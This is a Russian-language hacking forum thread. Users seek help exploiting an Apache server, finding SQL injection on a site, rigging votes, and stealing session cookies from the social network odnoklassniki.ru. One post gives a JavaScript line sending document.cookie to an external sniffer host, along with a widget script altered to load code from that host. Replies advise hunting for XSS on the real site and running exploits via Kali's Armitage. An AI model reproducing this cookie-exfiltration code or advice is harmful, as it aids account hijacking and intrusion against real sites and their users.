Подскажите как я могу этим воспользоваться.

Хы, да тебе повезло. Ты можешь захапать себе весь сервер, т.к в этой Apache есть уязвимость.
Но она вроде работает под бздями (BSD), с SunOs может не прокатить, но все равно попробуй.
Тебе нужно использовать Exploit. Скачай набор Backtrack или Kali Linux.
Там есть такая штука, называется Armitage. Погугли как ей пользоваться)

Лучше нагуглить отдельно сплойт и запустить его под своей системой. Качать и ставить целую ОСь ради единичной попытки пробить теоретически уязвимую софтину... гм. Нерационально.

всем привет. помогите пожалуйста найти на сайте Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
sql уязвимость. у меня что то никак не получается.

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
что это? похоже на инклуд?

Похоже было сначала, но проинклудить что-либо не удалось

здравствуйте , я хочу украсть куки через йфраме ,но не получается потому что кукиси на втором домене



img.src="http://snifer.ejan.ru/img.php?"+document.cookie;

я хочу взломать странички одноклассники.ру и там ставить мой сципт не получится ))) я могу так собирать куки из одноклассники.ру и хочу это отправить в сниффер

!function (d, id, did, st) {
var js = d.createElement("script");
js.src = "http://snifer.ejan.ru/connect.js";
js.onload = js.onreadystatechange = function () {
if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
if (!this.executed) {
this.executed = true;
setTimeout(function () {
OK.CONNECT.insertGroupWidget(id,did,st);
}, 0);
}
}}
d.documentElement.appendChild(js);
}(document,"ok_group_widget","52864984219766","{wi dth:250,height:335}");

Цитата:

Сообщение от djhovo09

здравствуйте , я хочу украсть куки через йфраме ,но не получается потому что кукиси на втором домене

Правильно, у тебя и не получиться украсть куки с другого домена.
Ищи пасивку/активку на одноклассниках и действуй, я больше чем уверен - xss там есть

http://www.gamenet.ru/beauty/gallery/?sex=&order=1 как на этом сайте накрутить голоса?